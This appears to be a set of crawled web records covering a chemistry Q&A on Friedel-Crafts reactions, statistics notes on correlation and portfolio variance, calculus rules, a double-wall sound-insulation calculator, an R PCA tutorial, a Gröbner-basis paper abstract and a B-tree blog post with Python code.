; | 2023-01-29 13:50:50 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8995983600616455, "perplexity": 1194.9239071530508}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499713.50/warc/CC-MAIN-20230129112153-20230129142153-00420.warc.gz"} |
https://chemistry.stackexchange.com/questions/107984/friedel-craft-reaction-with-amide-substituent | # Friedel-Crafts reaction with amide substituent
In this question, I know that aniline will not undergo the FC reaction, as it forms a complex with $$\ce {AlCl3}$$ and precipitates out. The answer given is (c) and I agree with it. However, the benzene ring with the amide substituent in (d) will also be deactivated, as the amide substituent puts a positive charge into resonance with the ring. So, will it undergo the FC reaction? Should the answer be both (c) and (d)?
• I read that -NHCOCH3 is ortho/para-directing. But by drawing the resonance structure, option (d) appears meta-directing. I am confused. – Gautam Jan 15 at 4:13
• – Tan Yong Boon Jan 15 at 10:15
• AlCl3 reacting with an amide may be difficult compared to amine since lonepair in an amide is in conjugation with carbonyl type group as well as benzene.So FC reaction of benzamide maybe possible – Chakravarthy Kalyan Jan 15 at 16:38 | 2019-09-23 05:06:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 1, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5209768414497375, "perplexity": 5021.460816189352}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514576047.85/warc/CC-MAIN-20190923043830-20190923065830-00516.warc.gz"} |
https://www.statistics-lab.com/%E7%BB%9F%E8%AE%A1%E4%BB%A3%E5%86%99%E9%87%91%E8%9E%8D%E7%BB%9F%E8%AE%A1%E4%BB%A3%E5%86%99mathematics-with-statistics-for-finance%E4%BB%A3%E8%80%83correlation/ | ### Statistics Assignment Help | Mathematics with Statistics for Finance Exam Help | CORRELATION
statistics-lab™ supports you throughout your study-abroad journey. We have established a solid reputation in Mathematics with Statistics for Finance (G1GH) tutoring, guaranteeing reliable, high-quality and original Statistics writing services. Our experts are extremely experienced in Mathematics with Statistics for Finance (G1GH), so all kinds of related assignments go without saying.
• Statistical Inference
• Statistical Computing
• (Generalized) Linear Models
• Statistical Machine Learning
• Longitudinal Data Analysis
• Foundations of Data Science
## Statistics Assignment Help | Mathematics with Statistics for Finance Exam Help | CORRELATION
Closely related to the concept of covariance is correlation. To get the correlation of two variables, we simply divide their covariance by their respective standard deviations:
$$\rho_{X Y}=\frac{\sigma_{X Y}}{\sigma_{X} \sigma_{Y}}$$
Correlation has the nice property that it varies between $-1$ and $+1$. If two variables have a correlation of $+1$, then we say they are perfectly correlated. If the ratio of one variable to another is always the same and positive then the two variables will be perfectly correlated.
If two variables are highly correlated, it is often the case that one variable causes the other variable, or that both variables share a common underlying driver. We will see in later chapters, though, that it is very easy for two random variables with no causal link to be highly correlated. Correlation does not prove causation. Similarly, if two variables are uncorrelated, it does not necessarily follow that they are unrelated. For example, a random variable that is symmetrical around zero and the square of that variable will have zero correlation.
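The zero-correlation case is easy to check numerically. Below is a small sketch in plain Python (the data values are made up for illustration) that computes the Pearson correlation of a variable symmetric around zero and its square:

```python
import math

def pearson(xs, ys):
    """Sample Pearson correlation: covariance over the product of std devs."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / n
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs) / n)
    sy = math.sqrt(sum((y - my) ** 2 for y in ys) / n)
    return cov / (sx * sy)

xs = [-2, -1, 0, 1, 2]       # symmetric around zero
ys = [x * x for x in xs]     # a deterministic function of xs ...
print(pearson(xs, ys))       # prints 0.0: yet the correlation is zero
```

Even though `ys` is completely determined by `xs`, the positive and negative contributions to the covariance cancel exactly.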
## PORTFOLIO VARIANCE AND HEDGING
If we have a portfolio of securities and we wish to determine the variance of that portfolio, all we need to know is the variance of the underlying securities and their respective correlations.
For example, if we have two securities with random returns $X_{A}$ and $X_{B}$, with means $\mu_{A}$ and $\mu_{B}$ and standard deviations $\sigma_{A}$ and $\sigma_{B}$, respectively, we can calculate the variance of $X_{A}$ plus $X_{B}$ as follows:
$$\sigma_{A+B}^{2}=\sigma_{A}^{2}+\sigma_{B}^{2}+2 \rho_{A B} \sigma_{A} \sigma_{B}$$
where $\rho_{A B}$ is the correlation between $X_{A}$ and $X_{B}$. The proof is left as an exercise. Notice that the last term can either increase or decrease the total variance. Both standard deviations must be positive; therefore, if the correlation is positive, the overall variance will be higher compared to the case where the correlation is negative.
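The identity is easy to verify on sample data. The sketch below (plain Python, with hypothetical return series) checks that the sample variance of $X_A + X_B$ matches the right-hand side of the formula:

```python
import math

def mean(v): return sum(v) / len(v)

def var(v):
    m = mean(v)
    return sum((x - m) ** 2 for x in v) / len(v)

def cov(a, b):
    ma, mb = mean(a), mean(b)
    return sum((x - ma) * (y - mb) for x, y in zip(a, b)) / len(a)

# hypothetical return series for two securities
A = [0.02, -0.01, 0.03, 0.00, -0.02]
B = [0.01, 0.02, -0.01, 0.03, 0.00]
P = [a + b for a, b in zip(A, B)]      # portfolio return X_A + X_B

rho = cov(A, B) / math.sqrt(var(A) * var(B))
lhs = var(P)
rhs = var(A) + var(B) + 2 * rho * math.sqrt(var(A)) * math.sqrt(var(B))
print(abs(lhs - rhs) < 1e-12)          # True: the identity holds exactly
```

The identity holds exactly for sample moments because $\rho_{AB}\sigma_A\sigma_B$ is just the covariance.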
If the variance of both securities is equal, then Equation $3.29$ simplifies to:
$$\sigma_{A+B}^{2}=2 \sigma^{2}\left(1+\rho_{A B}\right) \text { where } \sigma_{A}^{2}=\sigma_{B}^{2}=\sigma^{2}$$
Now we know that the correlation can vary between $-1$ and $+1$, so, substituting into our new equation, the portfolio variance must be bound by 0 and $4 \sigma^{2}$. If we take the square root of both sides of the equation, we see that the standard deviation is bound by 0 and $2 \sigma$. Intuitively this should make sense. If, on the one hand, we own one share of an equity with a standard deviation of $\$10$ and then purchase another share of the same equity, then the standard deviation of our two-share portfolio must be $\$20$ (trivially, the correlation of a random variable with itself must be one). On the other hand, if we own one share of this equity and then purchase another security that always generates the exact opposite return, the portfolio is perfectly balanced. The returns are always zero, which implies a standard deviation of zero.
In the special case where the correlation between the two securities is zero, we can further simplify our equation. For the standard deviation:
$$\rho_{A B}=0 \Rightarrow \sigma_{A+B}=\sqrt{2} \sigma$$
We can extend Equation $3.29$ to any number of variables:
\begin{aligned} Y &=\sum_{i=1}^{n} X_{i} \\ \sigma_{Y}^{2} &=\sum_{i=1}^{n} \sum_{j=1}^{n} \rho_{i j} \sigma_{i} \sigma_{j} \end{aligned}
In the case where all of the $X_{i}$'s are uncorrelated and all of the standard deviations are equal to $\sigma$, Equation $3.32$ simplifies to:
$$\sigma_{Y}=\sqrt{n} \sigma \quad \text { iff } \rho_{i j}=0 \forall i \neq j$$
## MOMENTS
Previously, we defined the mean of a variable $X$ as:
$$\mu=E[X]$$
It turns out that we can generalize this concept as follows:
$$m_{k}=E\left[X^{k}\right]$$
We refer to $m_{k}$ as the $k$ th moment of $X$. The mean of $X$ is also the first moment of $X$.
Similarly, we can generalize the concept of variance as follows:
$$\mu_{k}=E\left[(X-\mu)^{k}\right]$$
We refer to $\mu_{k}$ as the $k$ th central moment of $X$. We say that the moment is central because it is central around the mean. Variance is simply the second central moment.
While we can easily calculate any central moment, in risk management it is very rare that we are interested in anything beyond the fourth central moment.
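As a quick illustration (a sketch with a made-up sample, not from the text), the $k$th central moment can be computed directly from its definition:

```python
def central_moment(xs, k):
    """k-th sample central moment: E[(X - mu)^k]."""
    mu = sum(xs) / len(xs)
    return sum((x - mu) ** k for x in xs) / len(xs)

xs = [1.0, 2.0, 2.0, 3.0, 7.0]    # hypothetical sample, mean = 3.0
print(central_moment(xs, 1))      # 0.0: the first central moment is always zero
print(central_moment(xs, 2))      # 4.4 (the variance, i.e. the second central moment)
```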
| 2023-03-24 12:54:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9147166609764099, "perplexity": 503.69490069598777}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945282.33/warc/CC-MAIN-20230324113500-20230324143500-00772.warc.gz"}
https://astarmathsandphysics.com/igcse-maths-notes/470-differentiation-product-quotient-chain-rules.html | ## Differentiation - Product, Quotient, Chain Rules
The three rules are given by the formulae:

Product Rule: $(uv)' = u'v + uv'$

Quotient Rule: $\left(\frac{u}{v}\right)' = \frac{u'v - uv'}{v^2}$

Chain Rule: $(u(v))' = v'u'(v)$
For each of these rules you can complete the table
u v u' v'
Then sub into the formula
Examples

Differentiate $sin(x^2+x)$. Here $u = \sin v$, $v = x^2+x$, $u'(v) = \cos v$ and $v' = 2x+1$. Substituting into the chain rule formula:
$(u(v))'=v'u'(v)=(2x+1)cos(x^2+x)$ | 2019-02-16 13:31:28 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5783700942993164, "perplexity": 12091.693920168382}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247480472.38/warc/CC-MAIN-20190216125709-20190216151709-00576.warc.gz"} |
https://calculla.com/calculators/calculator/mass_law_for_double_wall | Mass law calculator for double layer
Calculator finds out sound reduction in decibels (dB) for double layer wall with given density, thickness and air gap width using so-called mass law equation.
# Transmission loss at various frequencies#
Frequency [Hz] | Transmission loss [dB]
---|---
31.25 | 44.54
62.5 | 50.56
125 | 56.58
250 | 62.6
500 | 68.62
1000 | 74.64
2000 | 80.66
4000 | 86.68
8000 | 92.7
16000 | 98.72
# Sound insulation#
• When a sound wave moving through the air meets a barrier in the form of a wall, part of the acoustic energy is reflected, part is absorbed inside the wall (converted to heat), and the remaining part is transmitted through to the other side of the wall. We can write this mathematically as follows:
$\alpha + \beta + \tau = 1$
where:
• $\alpha$ - absorption coefficient (determines the part of the energy that was absorbed inside the wall),
• $\beta$ - reflection coefficient (defines the part of the energy remaining in the first room),
• $\tau$ - transmission coefficient (defines the part of the energy that was emitted to the second room).
• The transmission coefficient can be used as a measure of the acoustic insulation, because it determines the sound intensity ratio on both sides of the wall:
$\tau = \frac{I_t}{I_0}$
where:
• $I_t$ - intensity of the wave on the other side of the wall (sound intensity level audible in the second room),
• $I_0$ - incident wave intensity (sound intensity level audible in the first room).
• In practice, the transmission factor is most often given in the logarithmic scale. In this way, we obtain a decrease in sound intensity given in decibels, so-called transmission loss:
$\Delta TL = -10 ~ log (\tau) = 10 ~ log \left(\frac{1}{\tau}\right)$
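As a quick worked example (with a made-up transmission coefficient), a wall that transmits one thousandth of the incident energy attenuates the sound by 30 dB:

```python
import math

tau = 0.001                        # hypothetical transmission coefficient
delta_TL = -10 * math.log10(tau)   # transmission loss in dB
print(delta_TL)                    # about 30 dB: intensity drops by a factor of 1000
```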
# Some facts#
• The acoustic insulation of a single wall is limited by its thickness and density of the material used. We can overcome these limits using two walls separated by air gap. The resulting system is called depending on the source:
• wall-air-wall,
• mass-air-mass,
• mass-spring-mass (more often found in theoretical papers where such a system is modeled by two masses connected with a spring).
• Sound reduction index for double wall can be estimated using formulas introduced by London in 1950, updated later by Sharp in 1973:
$R(f) = \begin{cases} 20 ~ log\left[f \cdot (h_1 ~ \rho_1 + h_2 ~ \rho_2) \right] - 47, & \text{when } f \lt f_0 \\ R_1 + R_2 + 20 ~ log(f \cdot d) - 29, & \text{when } f_0 \le f \le f_l \\ R_1 + R_2 + 6, & \text{when } f \gt f_l \end{cases}$
where:
• $R$ - decrease of the sound intensity level of a partition consisting of two walls in decibels,
• $R_1, R_2$ - sound level decrease calculated for the first and second walls separately,
• $h_1, h_2$ - thickness of the first and second walls,
• $\rho_1, \rho_2$ - material density of which the first and second walls are made,
• $d$ - distance between walls (cavity width),
• $f$ - frequency of the acoustic wave,
• $f_0$ - resonant frequency $f_0 = \sqrt{\frac{\rho_0 \cdot c_0^2}{d} \cdot \frac{h_1 ~ \rho_1 + h_2 ~ \rho_2} {h_1 ~ \rho_1 ~ h_2 ~ \rho_2}}$,
• $f_l$ - limit frequency $f_l \approx \frac{55}{d}$,
• $c_0$ - speed of sound in the air,
• $\rho_0$ - air density
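The piecewise estimate above can be sketched in code. The following is an illustrative Python implementation assuming the standard London/Sharp branch structure (combined mass law below $f_0$, a cavity term between $f_0$ and $f_l$, and $R_1 + R_2 + 6$ above $f_l$, with $f_l$ taken as roughly $55/d$); treat it as a sketch rather than the calculator's exact algorithm:

```python
import math

def wall_R(f, m):
    """Single-wall mass law: R = 20 log10(f * m) - 47, m = surface density [kg/m^2]."""
    return 20 * math.log10(f * m) - 47

def double_wall_R(f, m1, m2, d, c0=343.0, rho0=1.21):
    """Sketch of the London/Sharp double-wall estimate (assumed branch structure)."""
    f0 = math.sqrt(rho0 * c0**2 / d * (m1 + m2) / (m1 * m2))  # resonant frequency
    fl = 55.0 / d                                 # limit frequency (assumed ~55/d)
    if f < f0:
        return wall_R(f, m1 + m2)                 # walls act as one combined mass
    elif f <= fl:
        return wall_R(f, m1) + wall_R(f, m2) + 20 * math.log10(f * d) - 29
    else:
        return wall_R(f, m1) + wall_R(f, m2) + 6

# e.g. two 10 kg/m^2 leaves, 0.1 m apart, at 100 Hz (below resonance)
print(round(double_wall_R(100, 10, 10, 0.1), 1))  # 19.0
```

Below resonance the air gap contributes nothing: the result equals the mass law for a single wall with the combined surface density.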
If you're interested in calculators related to acoustics, check out our other calculators:
• Sound intensity level (dB) - if you want to learn what is decibel and how the sound intensity level is measured,
• Sound velocity in materials - if you want to learn how the type of substance affects the speed of acoustic wave propagation,
• Acoustic impedance of substances - if you want to learn what is acoustic impedance and how it depends on the type of substance,
• Sound wave reflection - if you want to find out how an acoustic wave behaves when it encounters an obstacle in the form of media boundary,
• Mass law: single wall - if you're interested in building acoustics and would like to estimate the acoustic insulation of a single wall,
• Mass law: double wall - if you're interested in building acoustics and would like to estimate the acoustic insulation of a double wall with an air gap between the walls,
• Sound absorption coefficients - if you're interested in acoustic adaptation of room and you would like to learn how different materials absorb the acoustic wave,
• Noise propagation - if you want to learn how sound intensity level changes with distance from the source,
• Sound insulation countours - if you want to learn more about acoustic insulation assessment standards used over the world,
• Sound reduction index (SRI) - if you're searching for acoustic insulation of popular building materials expressed in the coefficient Rw,
• Sound transmission class (STC) - if you're searching for acoustic insulation of popular building materials expressed by the index STC.
# Room within the room#
• A room whose all walls and ceiling are surrounded by an empty air gap (the room has no common walls with others except a common floor) is often called a room-within-the-room.
• The disadvantage of this solution is high cost and permanent modification of the building.
• For example, in order to isolate a medium-sized live room with a usable area of approx. 26 m2 we need an additional approx. 24 m2 of empty space for air-gap insulation (assuming a distance between the walls of 1 m). Additionally, it is necessary to raise the entire building or to give up part of the height of the separated room (to leave an empty space under the outer room ceiling).
• For this reason, classic room-within-the-room solutions are used only in specialized buildings whose purpose is permanently tied to the need for high acoustic insulation, such as recording studios or sound laboratories.
| 2022-08-14 09:04:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 21, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5607494115829468, "perplexity": 1048.7190918791628}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572021.17/warc/CC-MAIN-20220814083156-20220814113156-00446.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/algebra-1-common-core-15th-edition/chapter-1-foundations-for-algebra-1-2-order-of-operations-and-evaluating-expressions-practice-and-problem-solving-exercises-page-15/80 | ## Algebra 1: Common Core (15th Edition)
$\frac{17}{40}$
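The reduction of $\frac{425}{1000}$ to lowest terms can be double-checked with Python's `fractions` module (a quick aside, not part of the textbook solution):

```python
from fractions import Fraction

print(Fraction(425, 1000))                      # 17/40, reduced automatically
print(Fraction(425, 1000) == Fraction("0.425"))  # True
```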
Given 0.425, write it as a fraction: $\frac{425}{1000}$. Simplify the fraction: $\frac{17}{40}$. | 2018-10-23 23:15:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9088449478149414, "perplexity": 7046.173741116112}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583517495.99/warc/CC-MAIN-20181023220444-20181024001944-00354.warc.gz"}
https://bookdown.org/content/1340/principal-component-analysis.html | ## 6.3 Principal component analysis
Let’s retain only two components or factors:
summary(full_factor(toothpaste, dimensions, nr_fact = 2)) # Ask for two factors by filling in the nr_fact argument.
## Factor analysis
## Data : toothpaste
## Variables : prevents_cavities, shiny_teeth, strengthens_gums, freshens_breath, decay_prevention_unimportant, attractive_teeth
## Factors : 2
## Method : PCA
## Rotation : varimax
## Observations: 60
##
## RC1 RC2
## prevents_cavities 0.96 -0.03
## shiny_teeth -0.05 0.85
## strengthens_gums 0.93 -0.15
## freshens_breath -0.09 0.85
## decay_prevention_unimportant -0.93 -0.08
## attractive_teeth 0.09 0.88
##
## Fit measures:
## RC1 RC2
## Eigenvalues 2.69 2.26
## Variance % 0.45 0.38
## Cumulative % 0.45 0.82
##
## Attribute communalities:
## prevents_cavities 92.59%
## shiny_teeth 72.27%
## strengthens_gums 89.36%
## freshens_breath 73.91%
## decay_prevention_unimportant 87.78%
## attractive_teeth 79.01%
##
## Factor scores (max 10 shown):
## RC1 RC2
## 1.15 -0.30
## -1.17 -0.34
## 1.29 -0.86
## 0.29 1.11
## -1.43 -1.49
## 0.97 -0.31
## 0.39 -0.94
## 1.33 -0.03
## -1.02 -0.64
## -1.31 1.56
Have a look at the table under the header Factor loadings. These loadings are the correlations between the original dimensions (prevents_cavities, shiny_teeth, etc.) and the two factors that are retained (RC1 and RC2). We see that prevents_cavities, strengthens_gums, and decay_prevention_unimportant score highly on the first factor, whereas shiny_teeth, freshens_breath, and attractive_teeth score highly on the second factor. We could therefore say that the first factor describes health-related concerns and that the second factor describes appearance-related concerns.
We also want to know how much each of the six dimensions are explained by the extracted factors. For this, we can look at the communality of the dimensions (header: Attribute communalities). The communality of a variable is the percentage of that variable’s variance that is explained by the factors. Its complement is called uniqueness (= 1-communality). Uniqueness could be pure measurement error, or it could represent something that is measured reliably by that particular variable, but not by any of the other variables. The greater the uniqueness, the more likely that it is more than just measurement error. A uniqueness of more than 0.6 is usually considered high. If the uniqueness is high, then the variable is not well explained by the factors. We see that for all dimensions, communality is high and therefore uniqueness is low, so all dimensions are captured well by the extracted factors.
We can also plot the loadings. For this, we’ll use two packages:
install.packages("FactoMineR")
install.packages("factoextra")
library(FactoMineR)
library(factoextra)
toothpaste %>% # take dataset
select(-consumer,-age,-gender) %>% # retain only the dimensions
as.data.frame() %>% # convert into a data.frame object, otherwise PCA won't accept it
PCA(ncp = 2, graph = FALSE) %>% # do a principal components analysis and retain 2 factors
fviz_pca_var(repel = TRUE) # take this analysis and turn it into a visualization
We see that attractive_teeth, shiny_teeth, and freshens_breath have high scores on the second factor (Dim2). prevents_cavities and strengthens_gums have high scores on the first factor (Dim1), and decay_prevention_unimportant has a low score on that factor (this variable measures how unimportant prevention of decay is). We can also add the observations (the different consumers) to this plot:
toothpaste %>% # take dataset
select(-consumer,-age,-gender) %>% # retain only the dimensions
as.data.frame() %>% # convert into a data.frame object, otherwise PCA won't accept it
PCA(ncp = 2, graph = FALSE) %>% # do a principal components analysis and retain 2 factors
fviz_pca_biplot(repel = TRUE) # take this analysis and turn it into a visualization
This is also called a biplot. | 2019-05-25 01:56:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5355165600776672, "perplexity": 7284.545114176232}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232257845.26/warc/CC-MAIN-20190525004721-20190525030721-00113.warc.gz"} |
http://eprint.iacr.org/2010/158/20100324:154206 | ## Cryptology ePrint Archive: Report 2010/158
A variant of the F4 algorithm
Antoine Joux and Vanessa Vitse
Abstract: Algebraic cryptanalysis usually requires to find solutions of several similar polynomial systems. A standard tool to solve this problem consists of computing the Gröbner bases of the corresponding ideals, and Faugère's F4 and F5 are two well-known algorithms for this task. In this paper, we present a new variant of the F4 algorithm which is well suited to algebraic attacks of cryptosystems since it is designed to compute Gröbner bases of a set of polynomial systems having the same shape. It is faster than F4 as it avoids all reductions to zero, but preserves its simplicity and its computation efficiency, thus competing with F5.
Category / Keywords: Gröbner basis, F4, F5, multivariate cryptography, algebraic cryptanalysis | 2016-07-01 16:29:15 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8175031542778015, "perplexity": 868.047542522002}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783403502.46/warc/CC-MAIN-20160624155003-00034-ip-10-164-35-72.ec2.internal.warc.gz"} |
http://ternarysearch.blogspot.com/2013/05/b-trees.html | ## Sunday, May 5, 2013
### B-trees
The B-tree is one of the fundamental data structures used by database indexes. It is essentially a generalization of the binary search tree where each node can contain more than two children. I never got around to actually learning how a B-tree is implemented and how all the operations work, so I figured I would take a blog post to lay it all out. The main tuning parameter of B-trees is the degree, which controls how many children each node has. If the degree is $2d$, then each internal node (except potentially the root) has between $d$ and $2d$ children, inclusive. An internal node with $k$ children has $k-1$ separator values which denote the ranges that the children cover, e.g. if the separator values are $\{2, 5,8\}$ then the children could cover the ranges $(-\infty, 2)$, $(2, 5)$, $(5, 8)$, and $(8, \infty)$, assuming we know nothing about how the parent has already been bounded. Leaves which are not also the root have the same requirement on the number of keys, i.e. between $d-1$ and $2d-1$. Additionally, all leaves are at the same depth in the tree. We'll see how these properties are maintained through all of the operations on the tree.
First, let's start with the easy operation, looking up a key in the B-tree. Similarly to a binary search tree, we start at the root and traverse downwards by picking the appropriate child. This is done by choosing the child whose range contains the key we are searching for; if $d$ is sufficiently large, we can do a binary search within the node to find the right child. Next, consider insertion. Again, we traverse down the tree by choosing the appropriate child until we reach a leaf. If the leaf is not full (it can contain a maximum of $2d-1$ keys like internal nodes), then we simply add the key to the leaf. If it is full, then we consider all $2d$ keys, split them into two groups of keys using one of the median keys $m$, and insert $m$ into the parent node. If the parent is not full, then we are done. Otherwise, we repeat the process; if the root is full and has a key inserted into it, we split those keys as before and create a new root that has two children. The latter is the only case in which the height of the tree increases, and since we create a new root, all leaves are still at the same depth.
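The search and insertion procedures just described can be sketched in code. The following is an illustrative Python implementation (it splits full nodes preemptively on the way down, a common variant of the bottom-up splitting described above), with each node holding between $d-1$ and $2d-1$ keys:

```python
import bisect

class BTreeNode:
    def __init__(self, leaf=True):
        self.keys = []
        self.children = []
        self.leaf = leaf

class BTree:
    """B-tree of degree 2d: every node holds between d-1 and 2d-1 keys."""
    def __init__(self, d):
        self.d = d
        self.root = BTreeNode()

    def search(self, key, node=None):
        node = self.root if node is None else node
        i = bisect.bisect_left(node.keys, key)   # binary search within the node
        if i < len(node.keys) and node.keys[i] == key:
            return True
        return False if node.leaf else self.search(key, node.children[i])

    def _split_child(self, parent, i):
        d, child = self.d, parent.children[i]
        right = BTreeNode(leaf=child.leaf)
        parent.keys.insert(i, child.keys[d - 1])          # median key moves up
        right.keys, child.keys = child.keys[d:], child.keys[:d - 1]
        if not child.leaf:
            right.children, child.children = child.children[d:], child.children[:d]
        parent.children.insert(i + 1, right)

    def insert(self, key):
        if len(self.root.keys) == 2 * self.d - 1:  # full root: height grows by one
            old = self.root
            self.root = BTreeNode(leaf=False)
            self.root.children.append(old)
            self._split_child(self.root, 0)
        self._insert_nonfull(self.root, key)

    def _insert_nonfull(self, node, key):
        if node.leaf:
            bisect.insort(node.keys, key)
            return
        i = bisect.bisect_right(node.keys, key)
        if len(node.children[i].keys) == 2 * self.d - 1:
            self._split_child(node, i)             # split full child preemptively
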